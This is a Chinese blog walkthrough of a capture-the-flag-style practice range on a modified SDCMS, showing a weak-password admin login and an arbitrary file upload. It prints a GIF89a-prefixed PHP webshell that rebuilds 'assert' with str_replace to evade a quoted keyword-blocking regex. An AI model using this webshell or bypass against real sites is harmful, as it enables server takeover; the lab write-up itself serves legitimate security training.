内部靶场系列|Sdcms

已于 2024-04-18 15:52:11 修改
阅读量679 收藏 8
点赞数 1
文章标签: 安全 网络安全 web安全 sql 数据库
于 2023-06-09 16:32:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kailiaq_1/article/details/131130537
版权

一、 靶场考核点

靶场说明:魔改后的cms

漏洞类型:任意文件上传

难点:合适的文件头部,文件内容需要绕过正则拦截

二、 靶场复现

1、 弱口令进入后台 admin/admin

http://192.168.93.225:84/?m=admin

2、选择文件上传

3、上传jpg后缀的文件

4、提示非法图像文件,初步怀疑会检测文件头,添加GIF89a

5、还是提示非法图像文件,尝试上传正常的图片,发现可以上传

6、猜测是否会检测文件内容,尝试上传未带有关键字的文件内容,发现上传成功

7、由此可见,该应用会检测文件内容是否带有关键字段,先查看是否能上传php文件,且是否能解析php代码

8、绕过关键字拦截进行上传

GIF89a

<?php

$a = str_replace("b", "", "phpbinfob");

$a();

           ?>

9、访问

10、ctrl+f 搜索flag

11、上传webshell

GIF89a

<?php

               $a = str_replace("b", "", "absbsbebrbt");

               $a($_POST['csb666']);

           ?>

12、连接webshell

三、 漏洞分析

1、根据关键字定位业务关键代码

2、其中/app/admin/controller/upload.php为后台上传相关代码,通读代码发现此文件跟漏洞关联性不大

/app/lib/class/sdcms_upload.php为文件上传相关代码,定义了白名单

3、这里将 php  添加进了白名单

请求中的type参数决定了是图片文件,还是视频文件,或者是附件文件

(这里我修改了 type =1   type=3,方便在上传图片、附件进行测试)

如果上传文件的后缀名,不在白名单里的话,会提示文件类型错误

4、单纯的在这里加了白名单,那么任意的php文件都可以上传,显得有点简单,因此继续往下面看代码

如果在这个if语句这里添加 “.php”,那么上传的php文件进入到这个判断里来

5、这个判断语句中的check_bad 函数会检测上传的文件是否合法

6、全局搜索check_bad 函数,发现正则匹配来拦截关键字

$num=preg_match_all("/(phpinfo|pack\(|str_rot13|system\(|eval\(|request\(|execute\(|file_put_contents|file_get_contents|exec\(|chroot\(|scandir\(|chgrp\(|chown\(|proc_open\(|popen\(|putenv\(|proc_get_status|error_log\(|ini_alter\(|ini_set\(|ini_restore\(|dll\(|pfsockopen\(|syslog\(|readlink\(|symlink\(|stream_socket_server|preg_replace\(|delfolder\(|unlink\(|mkdir\(|fopen\(|fread\(|fwrite\(|fputs\(|tmpfile\(|flock\(|load_file\(|outfile\(|chmod\(|delete\(|payload\(|assert\(|cmdshell\(|wshshell\(|_post\(|_get\(|_file\(|create_function|call_user_func|passthru\(|array_walk|getenv\(|register_|escapeshellcmd\(|rmdir\(|rename\(|readfile\(|session_|array_filter|array_flip|array_merge|shell_|parse_str|glob\(|import_|get_defined_|get_included_)/Ui",str_replace(["'.'","\".\""],"",$str),$match);

7、既然知道了拦截规则,那么现在就来绕过。由上可知,该函数基本上拦截常见的关键字(eg: phpinfo),但是规则是死的,人是活的,只要将关键字进行拆分、隔开等就可以实现绕过。

这里用的是str_replace 函数(替换字符串)从一串字符中提出关键字

如:

Phpinfo()

<?php

$a = str_replace("b", "", "phpbinfob");

$a();

           ?>

//将b替换为空  phpbinfob  ---> phpinfo

Webshell

<?php

               $a = str_replace("b", "", "absbsbebrbt");

               $a($_POST['csb666']);

           ?>

// absbsbebrbt  ---> assert

8、上传webhsell

白帽子凯哥
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
阿里云漏洞修复
01-07
RHSA-2018:3665-重要: NetworkManager 安全更新 yum update NetworkManager #有效 yum update NetworkManager-libnm yum update NetworkManager-team yum update NetworkManager-tui yum update NetworkManager-wifi RHSA-2017:1931-中危: bash 安全和BUG修复更新代码执行 yum update bash #有效 RHSA-2018:1700-重要: procp
SDCMS靶场通过
最新发布
I_WORM的博客
01-18 622
通过不断的测试,发现服务器端检测的是MIME类型和文件中是否有phpinfo,eval等敏感字符串;修改文件名为998.php,利用变量传值的方式把phpinfo进行拆解,成功绕过服务器端的验证(文件上传成功,复制文件路径打开)打开网站首页,找到一个网址(www.sdcms.cn)(具体在哪里我给忘了,就是一同乱点,抓包看响应包内容找到的);文件成功解析(如果想获取对方webshell只需要用同样的方法对语句进行拆解合并就行)通过弱口令admin admin进入,找到文件上传点。
靶场练习——SDcms文件上传漏洞靶场
p36273的博客
09-15 1082
今次练习的是SDcms靶场,该靶场是一个文件上传漏洞系列靶场靶场如下: 如图所示,登录页面参数是?m=login尝试把上面URL的参数login改成admin,如下图,进入成功。 这里第一反应使用了账号密码爆破,发现对访问的IP有限制,一旦超过错误访问次数,就会被限制登录,图片如下: 使用账号密码admin/admin,成登录网站后台 找到如图所示的文件上传点 如图找到文件上传的路径:/upfile/2023/09/在Burp中把 .jpg 改成 .php,然后再文件内容中添加GIF89a头部,发现ph
SDCMS靶场漏洞挖掘
huohaowen的博客
12-25 1718
本篇blog主要是sdcms靶场漏洞挖掘
sdcms代码审计之sql注入
willow_liang的博客
10-30 1718
1.漏洞注入点分析(黑名单 ) 2.注入payload构造(双参数构造,sqlmap绕过) 注册账号后发现网站有在线留言功能,可以查看能否注入 查看F函数 #F函数(get和post) function F($a,$b='') { $a=strtolower($a); if(!strpos($a,'.')) { $method='other'; } else { list($method,$a)=explode('.',$a,2); } switch ($method) {
验证码绕过、密码找回漏洞简介
seek_2022的博客
06-05 1138
本文首先介绍验证码绕过的常见姿势及密码找回漏洞,通过本地搭建cms进行测试,确定漏洞的利用方法,并在相应的靶场上进行漏洞复现,演示了验证码漏洞的利用过程
SDCMS网站建设模版系列源代码
03-18
SDCMS企业建站模版系列 此模版适用于SDCMS网站内容管理系统 1.3或1.3.1 下载模版后解压缩到根目录Skins文件包内即可 文件内部分内容需要自行修改 若不懂可以参考SDCMS手册或者与我联系!
sdcms3.1.zip
04-05
SDCMS3.1作为其第三个主要版本,带来了许多优化和改进,旨在提升用户体验和管理效率。 在SDCMS3.1中,我们可以看到以下关键知识点: 1. **模块化设计**:SDCMS3.1采用了模块化的结构,允许用户根据需求安装和卸载...
SDCMS 企业商业版2.0版本
09-19
- `book.asp`:可能代表图书或专辑类的内容展示,用于呈现一系列相关的内容。 - `list.asp`:列表页,展示某一分类下的所有内容摘要,便于用户浏览和导航。 - `config.asp`:系统配置文件,包含网站的基本设置、...
sdcms.rar_idcms_sdcms
09-24
【标题】"sdcms.rar_idcms_sdcms" 指的是一个名为 "sdcms" 的基于JAVA EE技术的Web应用系统源代码压缩包,该系统可能与 "idcms" 相关,因为它们一同出现在了标签中。"sdcms" 可能代表 "Site Development and Content...
SDCMS微信公众平台管理系统ASP版 v1.x.rar
07-10
SDCMS微信公众平台管理系统,SDCMS一向都比较好用,还记SDCMS吗?被很多站长改成了各种站点,比如网址站、文章站、地方门户等。这个微信公众平台管理系统同样是来自SDCMS团队,功能模块有:关注回复、自动回复、关键字回复、自定义菜单、个性化菜单、粉丝管理、消息管理、图文素材、群发管理、微支付插件、微投票插件等,有兴趣的可以一试哦。
SDCMS三网合一企业网站管理系统 v1.3
11-26
SDCMS三网合一企业网站管理系统是一个以PHP+MySQL进行开发的三网合一网站源码。 SDCMS三网合一企业网站管理系统 v1.3更新日志: 本次更新改动记录如下: 新增功能: 01、新增一个内容可
时代设计网站信息管理系统SDCMS v1.1 SP1.rar
07-05
SDCMS是由时代设计全力打造的一款网站信息管理系统。SDCMS以信息为主题,通过以文字和图片标题为起点,以无限栏目分类为支撑,配合多项插件的灵活使用,以达到信息门户的远景!  SDCMS总结各类信息门户的现状,充分考虑符合站长需求的前提下。设计了灵活多变的标签调用方式,满足了不同层次的需求。 SDCMS安全第一为原则,解决了ASP程序的常见漏洞问题(服务器自身的问题除外)。程序自身无任何后门,严格的代码过滤功能为网站的安全运行提供了可靠的保障。 SDCMS以DIV CSS为框架,在主流的IE和FF浏览器上测试均能正常运行。系统全自动生成HTML文件,无需独自生成任何文件(调整系统界面的除外)。SDCMS做了很大程度上的优化,为每个信息都设置了关键字功能,在同类系统中能尽快被搜索引擎收录,为网站带来流量,甚至收入! SDCMS的发展离不开大家的支持,欢迎有志于参与SDCMS基础建设和发展的各位朋友! 功能简介: SDCMS后台设有五大栏目导航分别为:系统管理、信息管理、插件管理、界面管理以及生成管理。  系统管理:包含系统设置、系统日志、友情链接以及系统帐户管理等栏目的管理。   信息管理:包含通知、信息分类、信息以及单页内容的管理。   插件管理:包含投票 修正的功能 1.修正了修改管理员密码会自动退出登陆的问题 2.修正了友情连接未加上顺序调整的问题 3.修正了FF下广告组不能显示等一系列FF下出现的问题 4.修正了广告管理中的一系列问题 调整的功能 1.上传的文件按日期放于附件文件夹内 2.改写了图片文件类型判断和站外文件判断函数 3.搜索单独放于search文件夹内 4.重新调整了调用的标签,更加人性化 5.分离了列表、搜索、公告等分页,更加方便设置分页和列表的样式 6.更改了分类关键字的类型 7.评论管理页增加信息链接 8.调整默认编辑器插入图片窗口大小 9.最新信息调用将根目录属性改为是否调用分类信息,具体请看标签说明 10.公告、信息,链接等栏目生成相关信息调整为可选择是否立刻生成 11.SDCMS后台目录调整为可以直接改名而不影响其他设置 12.改进了信息的生成方式,每生成20条信息自动暂停5秒 13.去掉了包含根目录设置的标签中的根目录选项,不在区分目录,且系统不再支持虚拟目录的使用 14.程序开始支持MSSQL的正常使用,存储过程稍后推出。 新增的功能 1.增加信息页面(当前)所在位置的导航连接 2.自定义标签增加作者和评论数量的显示标签 3.编辑器调整,增加去除超链接功能 4.后台登陆增加登陆失败处理次数限制,防止恶意登陆 5.增加站点地图功能sitemap.html和sitemap.xml以及RSS功能 6.后台信息,可以按分类管理信息和搜索信息 7.增加公告,信息以及单页的内分页功能 8.分类增加批量设置功能 9.信息、单页增加自定义名称的功能 10.增加站内链接功能 11.分类增加了分页数量的控制,方便调整各个类别的分页数量 12.信息显示页增加相关文章功能(依据tags,为空则显示最新) 13.增加eWebEditor_V4.60编辑器,后台系统设置里可以自由更换编辑器(需要使用ewebeditor其他版本的用户,只需要将editor/ewebeditor文件替换掉即可) 14.后台增加了对后台、单页以及附件目录的控制 15.增加对单条信息的评论控制,可以单独控制信息评论的开启和关闭防止恶意评论 16.增加对过滤设置的数据处理函数,防止评论,流言等模块出现星号以及不能提交信息的问题 17.最新信息调用增加按最后更新日期排序的功能 18.增加了幻灯信息标签{sdcms:flashinfo(t0,t1,t2,t3,t4)},详细参数请见标签说明
sdcms时代网站信息管理系统 v2.2 企业版
12-07
SDCMS企业版主要包含:文章、单图、商品、招聘、下载、单页、外链、定时发布、手机版、自定义字段、自定义表单等模块,系统内置评论,留言,心情,搜索,标签,7年企业网站建设经验为您精心打造,是您快速建立中小营销型企业网站的良好选择。 时代网站信息管
sdcms2.0正式版
10-18
sdcms2.0正式版
SDCMS网站建设模版系列 v1.3.1
10-17
在“SDCMS网站建设模版系列 v1.3.1”中,用户可以利用这一模板快速搭建专业的企业网站。该版本1.3.1是SDCMS系统的一个迭代更新,可能包含性能优化、新功能添加或已知问题修复。 模版适用于SDCMS 1.3或1.3.1,这意味...
SDcms后台拿webshell
收集盒 Book box
07-06 4705
第一种方法:进入后台-->系统管理-->系统设置-->系统设置->网站名称;把网站名称内容修改为   "%>用菜刀链接http://www.80lr.com/inc/const.asp  就搞定了。第二种方法:进入后台-->系统管理-->系统设置-->系统设置
sdcms_php_web,SDCMS通杀漏洞
weixin_28787801的博客
04-07 1151
作者:T00LS 鬼哥漏洞文件:后台目录/index.asp作者声明:转载请注明 T00ls 鬼哥Sub CheckDim username,password,code,getcode,RsIF Check_post Then Echo "1禁止从外部提交数据!":Exit Subusername=FilterText(Trim(Request.Form("username")),1)passwo...
文件包含漏洞
wutiangui的博客
07-07 847
php:// — 访问各个输入/输出流(I/O streams)不受allow_url_fopen和allow_url_include影响(filter需要4个参数)/usr/local/app/apache2/conf/httpd.conf //apache2配置文件。/usr/local/app/php5/lib/php.ini //php配置文件。/etc/httpd/conf/httpd.conf //apache配置文件。resoure=<要过滤的数据流> 必须参数,指定筛选过滤的数据流。
SDCMS-B2C商城网站管理系统
06-10
SDCMS-B2C商城网站管理系统是一款开源的B2C电子商务...如果您需要使用SDCMS-B2C商城网站管理系统,可以在官网或者GitHub上下载源码,并根据安装说明进行安装和配置。注意,使用该系统需要一定的技术基础和开发经验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值